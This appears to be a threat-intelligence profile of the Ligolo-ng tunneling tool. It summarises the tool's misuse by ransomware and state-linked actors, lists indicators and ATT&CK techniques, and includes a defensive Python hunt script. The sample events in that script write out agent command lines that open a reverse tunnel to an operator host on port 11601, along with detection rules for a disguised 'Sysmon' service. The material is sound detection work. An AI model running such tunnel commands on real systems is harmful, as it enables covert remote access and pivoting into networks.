ligolo-ng
Ligolo-ng is an open-source tunneling and pivoting tool written in Go. An agent on a compromised host opens an encrypted reverse TCP/TLS connection back to an operator-controlled proxy, and the operator then routes traffic through that tunnel into the agent's network. It is a legitimate red-team/offensive security utility, but the reporting collected here shows it repeatedly repurposed for malicious post-exploitation: covert remote access, persistence, and pivoting into internal networks.

Observed use cases include: Akira ransomware operators deploying it through an NSSM-created malicious service named "Sysmon" that launches Ligolo-ng or Ngrok for remote access; post-exploitation on compromised Citrix NetScaler ADC/Gateway appliances following exploitation of CVE-2023-3519, where actors installed a persistent Ligolo-ng-derived tunneler and in some cases also used NPS and web shells such as SECRETSAUCE and REGEORG.NEO; UAC-0247 intrusions against Ukrainian municipal and healthcare entities, in which CERT-UA observed LIGOLO-NG and CHISEL used to build covert tunnels; and broader intrusion infrastructure, including exposed C2 environments where a Ligolo-ng agent or proxy was staged or active.

Multiple reports specifically note Ligolo-ng proxy activity on TCP port 11601, often with self-signed TLS certificates whose subject or organization fields indicate Ligolo. Additional contexts tie Ligolo-ng to APT28-aligned Roundcube exploitation infrastructure, to Silent Lynx activity, and to Russian-hosted malicious infrastructure where it appeared alongside Sliver, Cobalt Strike, Tactical RMM, and other offensive frameworks repurposed for malicious use.

High-confidence indicators mentioned directly in the reporting are the filenames agent.exe and /var/tmp/the in Ligolo-ng-related deployments, execution from /tmp in one NetScaler case, and recurring network exposure on TCP port 11601 with self-signed TLS certificates associated with Ligolo. Note that 11601 is only the proxy's default listener and is trivial to change, so pair the port with the certificate fields or the agent artifacts rather than alerting on the port alone.
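The following hunt script turns the indicators above into checks that can be run over endpoint and network telemetry. It is an added example for this page, not code from the Ligolo-ng project or from any of the cited reports. The flat event schema (type, dst_port, subject, service_name, image, cmdline) and every sample event, hostname and IP are constructed for the example; the certificate value "O=Ligolo" is a placeholder for the Ligolo-indicating subject/organization fields the reporting describes rather than a value taken from a report. The "-connect host:port" argument is the Ligolo-ng agent's own connect flag. Each rule carries a confidence level so that a bare connection to 11601, which any operator can change, scores lower than the certificate, the NSSM-wrapped "Sysmon" service, or an agent launched from /tmp with connect arguments.

```python
"""Hunt for Ligolo-ng artifacts in constructed sample telemetry (added example,
not Ligolo-ng project code or code from any cited report)."""
import re
from collections import Counter
from dataclasses import dataclass

LIGOLO_DEFAULT_PORT = 11601                     # proxy default; trivially changed
SUSPECT_PORTS = {4040, 2083, 8181}              # other ports in the cited T1571 mapping
TMP_DIRS = ("/tmp/", "/var/tmp/")
AGENT_NAMES = {"agent.exe"}                     # filename cited in the reporting
AGENT_PATHS = {"/var/tmp/the"}                  # path cited in the NetScaler case
SYSMON_IMAGES = {"sysmon.exe", "sysmon64.exe"}
AGENT_CONNECT = re.compile(r"-connect\s+\S+:\d+")  # Ligolo-ng agent's connect flag


@dataclass(frozen=True)
class Finding:
    rule: str
    confidence: str  # "high", "medium" or "low"
    evidence: str


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_tls(ev):
    """Self-signed certificate whose subject or issuer names Ligolo: high on its own."""
    names = f"{ev.get('subject', '')} {ev.get('issuer', '')}".strip()
    if ev.get("self_signed") and re.search("ligolo", names, re.I):
        return [Finding("tls_cert_ligolo", "high", names)]
    return []


def check_conn(ev):
    """A bare connection to 11601 is only medium: it is a default, not a fingerprint."""
    port = int(ev.get("dst_port", 0))
    dst = f"{ev.get('dst_ip', '?')}:{port}"
    if port == LIGOLO_DEFAULT_PORT:
        return [Finding("ligolo_default_port", "medium", dst)]
    if port in SUSPECT_PORTS:
        return [Finding("nonstandard_port", "low", dst)]
    return []


def check_service(ev):
    """Service named Sysmon backed by NSSM (Akira tradecraft) or by a non-Sysmon binary."""
    name = ev.get("service_name", "")
    exe = _basename(ev.get("image_path", ""))
    evidence = f"{name} -> {ev.get('image_path', '')}"
    if "nssm" in exe:
        conf = "high" if name.lower() == "sysmon" else "medium"
        return [Finding("nssm_wrapped_service", conf, evidence)]
    if name.lower() == "sysmon" and exe not in SYSMON_IMAGES:
        # Sysmon can legitimately be installed under a renamed binary, so only medium.
        return [Finding("sysmon_image_mismatch", "medium", evidence)]
    return []


def check_process(ev):
    """Cited agent names/paths, and anything run from /tmp carrying agent connect arguments."""
    image, cmdline, out = ev.get("image", ""), ev.get("cmdline", ""), []
    if _basename(image) in AGENT_NAMES or image in AGENT_PATHS:
        out.append(Finding("ligolo_agent_filename", "medium", image))
    if image.startswith(TMP_DIRS):
        if AGENT_CONNECT.search(cmdline):
            out.append(Finding("tmp_binary_agent_connect", "high", cmdline))
        else:
            out.append(Finding("exec_from_tmp", "low", image))
    return out


CHECKS = {"tls": check_tls, "conn": check_conn, "service": check_service, "process": check_process}


def hunt(events):
    out = []
    for ev in events:
        out.extend(CHECKS.get(ev.get("type"), lambda e: [])(ev))
    return out


def summarize(findings):
    """Findings per confidence level, e.g. {'high': 3, 'medium': 3, 'low': 1}."""
    return dict(Counter(f.confidence for f in findings))


# Constructed events: a workstation beaconing to an operator proxy, a fake Sysmon
# service, and an appliance running an agent from /var/tmp. IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"type": "tls", "dst_ip": "203.0.113.10", "dst_port": 11601,
     "subject": "O=Ligolo", "issuer": "O=Ligolo", "self_signed": True},
    {"type": "conn", "dst_ip": "203.0.113.10", "dst_port": 11601},
    {"type": "conn", "dst_ip": "198.51.100.7", "dst_port": 8181},
    {"type": "conn", "dst_ip": "198.51.100.9", "dst_port": 443},
    {"type": "service", "service_name": "Sysmon", "image_path": r"C:\ProgramData\nssm.exe"},
    {"type": "service", "service_name": "Sysmon", "image_path": r"C:\Windows\Sysmon64.exe"},
    {"type": "process", "image": r"C:\ProgramData\agent.exe",
     "cmdline": r"C:\ProgramData\agent.exe -connect 203.0.113.10:11601 -ignore-cert"},
    {"type": "process", "image": "/var/tmp/the",
     "cmdline": "/var/tmp/the -connect 203.0.113.10:11601 -ignore-cert"},
    {"type": "process", "image": "/usr/bin/curl", "cmdline": "curl https://example.com/"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.confidence:6}] {f.rule}: {f.evidence}")
```

Run it directly to print the findings for the constructed events. In practice, feed it normalized events from your own telemetry, treat the high rules as alertable, and use the medium ones as pivots to corroborate, since the default port by itself proves little.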
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
CISA is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell...
Groups observed using it
2 distinct threat actors attributed by public researchers.
The software tools LIGOLO-NG and CHISEL may be used to build hidden tunnels.
Notably, port 11601 ran Ligolo-ng, a tunneling and pivoting tool popular in red team operations... used the C2 server as a pivot point for tunneling into compromised networks.
Techniques & procedures
12 distinct techniques documented for this family, organized by ATT&CK tactic:
Resource Development: 2 techniques
Persistence: 1 technique
Privilege Escalation: 1 technique
Lateral Movement: 1 technique
Command and Control: 8 techniques
Over a three-month window from January 1 to April 1, 2026, more than 1,250 active command-and-control (C2) servers were detected across 165 Russian infrastructure providers.
In some cases, the LIGOLO-NG and CHISEL tools were deployed to build hidden network tunnels
launched tunneling tools such as Ngrok or Ligolo-ng to establish remote access to the compromised machines
MITRE ATT&CK Mapping ... Proxy: Multi-hop Proxy T1090.003 Ligolo-ng tunnel proxy
As part of their initial exploit chain [T1190], the threat actors uploaded a TGZ file [T1105] containing a generic webshell [T1505.003], discovery script [TA0007], and setuid binary [T1548.001] on the ADC appliance.
MITRE ATT&CK Mapping ... Non-Standard Port T1571 Ports 4040, 2083, 8181, 11601
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
8 sources tracked across advisories, community write-ups, and news.
A tunneling/offensive security tool observed on the infrastructure and repurposed for malicious use.
A tunneling/proxy tool used to build covert tunnels within compromised environments.
A tunneling/pivoting utility used to route traffic into compromised environments; in this campaign it was exposed as a service on the operator infrastructure and used for network pivoting.
A legitimate tunneling/proxy tool used by the actor for persistence, lateral movement, and infrastructure administration through TLS 1.3 multiplexed tunnels.